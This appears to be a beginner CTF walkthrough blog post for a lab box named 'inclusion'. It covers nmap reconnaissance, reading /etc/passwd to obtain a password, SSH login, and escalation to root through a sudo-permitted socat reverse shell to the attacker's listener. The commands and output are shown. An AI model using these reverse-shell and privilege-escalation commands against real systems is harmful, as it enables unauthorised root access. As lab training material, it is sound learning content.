today's CTF is really easy, and really recommend it for beginners to CTFs, let's go straight to it
root@kali:~# nmap -sC -sV 10.10.94.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 14:38 UTC Nmap scan report for ip-10-10-94-6.eu-west-1.compute.internal (10.10.94.6) Host is up (0.0014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA) | 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA) |_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519) 80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9) |_http-title: My blog MAC Address: 02:13:CE:65:8B:84 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds root@kali:~#
We have two ports open 22 for SSH and 80 for HTTP running under python, which I think running django ... anyways!
and we have the /etc/passwd and a clear password for our user down there ...
root@kali:~# ssh email@example.com The authenticity of host '10.10.94.6 (10.10.94.6)' can't be established. ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.94.6' (ECDSA) to the list of known hosts. firstname.lastname@example.org's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri Apr 10 20:13:54 IST 2020 System load: 0.42 Processes: 87 Usage of /: 34.9% of 9.78GB Users logged in: 0 Memory usage: 32% IP address for eth0: 10.10.94.6 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 3 packages can be updated. 3 updates are security updates. Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107 falconfeast@inclusion:~$ sudo -l Matching Defaults entries for falconfeast on inclusion: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User falconfeast may run the following commands on inclusion: (root) NOPASSWD: /usr/bin/socat falconfeast@inclusion:~$
we are user falconfeast ! and we have a NOPASSWD SUDO FOR SOCAT .... speaking of socat, there's a PoC in GTFObins, I really recommend checking the website it does have a lot of good knowledge.
root@kali:~# socat file:`tty`,raw,echo=0 tcp-listen:5151
falconfeast@inclusion:~$ sudo -l Matching Defaults entries for falconfeast on inclusion: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User falconfeast may run the following commands on inclusion: (root) NOPASSWD: /usr/bin/socat falconfeast@inclusion:~$ RHOST=10.10.95.247 falconfeast@inclusion:~$ RPORT=5151 falconfeast@inclusion:~$ sudo /usr/bin/socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
root@kali:~# socat file:`tty`,raw,echo=0 tcp-listen:5151 sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) #
and that's it here, go get your flags!